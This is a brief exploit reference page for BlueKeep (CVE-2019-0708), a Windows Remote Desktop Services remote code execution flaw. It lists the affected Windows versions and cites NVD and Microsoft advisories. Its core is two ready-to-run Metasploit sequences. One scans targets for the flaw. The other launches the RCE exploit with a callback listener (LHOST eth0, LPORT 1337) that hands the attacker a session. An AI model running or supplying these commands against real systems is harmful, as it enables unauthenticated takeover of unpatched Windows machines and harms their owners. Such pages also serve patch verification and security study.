.. / CVE-2019-0708

Exploit for Microsoft Remote Desktop Services - Unauthenticated Remote Code Execution (BlueKeep, CVE-2019-0708)

Description:

A remote code execution vulnerability exists in Remote Desktop Services formerly known as Terminal Services when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests, aka ‘Remote Desktop Services Remote Code Execution Vulnerability’.

Affected Products:

Windows 2000
Windows Vista
Windows XP
Windows 7
Windows Server 2003
Windows Server 2003 R2
Windows Server 2008
Windows Server 2008 R2

Proof of Concept

PoC exploit

Metasploit Module

Check with Metasploit

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set RHOSTS YOUR_TARGET
set THREADS 25
run

Exploit with Metasploit

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS YOUR_TARGET
set LHOST eth0
set LPORT 1337
run

References:

https://nvd.nist.gov/vuln/detail/CVE-2019-0708
https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2019-0708
https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.md

.. / CVE-2019-0708 if(localStorage["style"]=="true"){ document.getElementById('pagestyle').setAttribute('href','/assets/styleDark.css'); document.querySelector('input[type="checkbox"]').checked = true }